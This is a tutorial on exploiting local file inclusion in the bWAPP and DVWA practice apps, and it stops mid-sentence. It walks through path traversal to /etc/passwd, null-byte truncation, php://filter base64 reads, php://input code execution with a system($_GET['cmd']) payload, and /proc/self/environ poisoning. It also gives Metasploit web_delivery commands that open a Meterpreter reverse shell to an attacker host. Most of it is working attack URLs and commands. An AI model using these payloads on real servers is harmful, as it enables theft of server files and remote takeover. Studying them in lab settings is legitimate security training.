
5 ways to Exploit LFi Vulnerability


The aim of this article is to show several techniques for attacking a web server that suffers from a file inclusion vulnerability. A local file inclusion (LFI) vulnerability lets a user include a file that lives on the server by supplying its path through the URL in the browser. In this article I have used two different platforms, bWAPP and DVWA, that contain file inclusion vulnerabilities, and through them I have performed the LFI attack in five different ways.

Basic local file inclusion

Open the target IP in the browser and log in to bWAPP as bee:bug. Choose the bug Remote & Local File Inclusion and click Hack.



The requested page, which suffers from both RFI and LFI, opens. It asks you to select a language from a drop-down list; when you click Go, the selected language file is passed as the language parameter in the URL. For the basic attack, change

http://192.168.1.101/bWAPP/rlfi.php?language=lang_en.php&action=go

into

http://192.168.1.101/bWAPP/rlfi.php?language=/etc/passwd

In a basic LFI attack we read a file directly by giving its path, either as an absolute path (/etc/passwd) or by climbing out of the web root with ../ sequences (for example ../../../../etc/passwd). In the screenshot below you can see that the password file is returned when the URL above is executed in the browser.


Null byte

At a higher bWAPP security level the basic attack above may no longer work: in the image below you can see that I fail to read the password file when I execute the same path in the URL. This usually means the application appends something to the parameter before including it, typically a fixed extension such as .php, so the server looks for /etc/passwd.php instead. In that case try a null byte: on PHP versions before 5.3.4 a %00 in the include path terminates the string, so whatever the application appends after it is discarded.

Now start Burp Suite to capture the browser request: select the Proxy tab and turn Intercept on. Do not forget to point the browser's proxy settings at Burp Suite while using it.



Inside Burp Suite, send the intercepted request to Repeater.



In Repeater you can analyse the request you send and the response it produces. The screenshot makes clear that /etc/passwd is not working and I am not able to read the password file.



In the next screenshot I resend the request with a null character (%00) appended to the path, /etc/passwd%00, and click Go. On the right side of the window the password file is returned in the response.


Base64 encoded

There is another way to exploit LFI when the security level is high and you are unable to view a file's content, in particular a PHP file, which the server would execute rather than display when it is included. The php://filter stream wrapper returns the file base64-encoded instead of executing it:

http://192.168.1.101/bWAPP/rlfi.php?language=php://filter/read=convert.base64-encode/resource=/etc/passwd

In the screenshot the content of the password file comes back base64-encoded; copy the whole encoded text.



I am using HackBar, a Firefox add-on, to decode the copied text.



A pop-up box opens; paste the copied encoded text into it and click OK.



The result shown in the screenshot is the decoded content of the password file.


PHP Input

With the php://input wrapper we can execute PHP code of our own choosing to exploit the LFI: the included "file" is the raw body of the POST request. This only works when allow_url_include is enabled in php.ini. I use HackBar for this task; first load the URL of the target page, as in the screenshot.

http://192.168.1.101/bWAPP/rlfi.php?language=lang_en.php&action=go



Now change the URL above to include php://input:

http://192.168.1.101/bWAPP/rlfi.php?language=php://input&cmd=ls

Then tick the Enable Post data check box, which turns the request into a POST, and put the following PHP code in the text area: <?php system($_GET['cmd']); ?>, as shown in the screenshot. Finally click Execute.

The included body is executed and system() runs the command given in the cmd parameter, so the directory listing of the victim machine is shown.



Now it is time to get a reverse connection from the victim. Open a terminal in Kali Linux and type msfconsole to start the Metasploit Framework, then:

use exploit/multi/script/web_delivery

msf exploit(web_delivery)> set target 1

msf exploit(web_delivery)> set payload php/meterpreter/reverse_tcp

msf exploit(web_delivery)> set lhost 192.168.0.104

msf exploit(web_delivery)> set srvport 8081

msf exploit(web_delivery)> exploit

Target 1 is the module's PHP target, so the payload must be a php/ payload; with it the module prints a php -r one-liner that fetches the stager from the listener and evaluates it.

Copy the highlighted command shown in the window below.



Paste the copied command into the URL as the value of the cmd parameter, as shown in the image, and execute the request; the injected system() call runs it on the server.



When the request executes, the attacker gets the victim's Meterpreter session inside Metasploit:

msf exploit(web_delivery)> sessions -i 1

meterpreter> sysinfo


Proc/self/environ

On an outdated server we can also exploit the LFI by including /proc/self/environ, the environment of the process that serves our request. When PHP runs as CGI that environment contains the request headers, including HTTP_USER_AGENT, so we can place PHP code in the User-Agent header and have it executed when the file is included. The file must be readable by the web server user and the request headers must actually appear in it (under mod_php they normally do not), so first check that it opens:

http://192.168.1.102/dvwa/vulnerabilities/fi/?page=/proc/self/environ



Now start Burp Suite, capture the browser request and send it to Repeater.


Add cmd commen
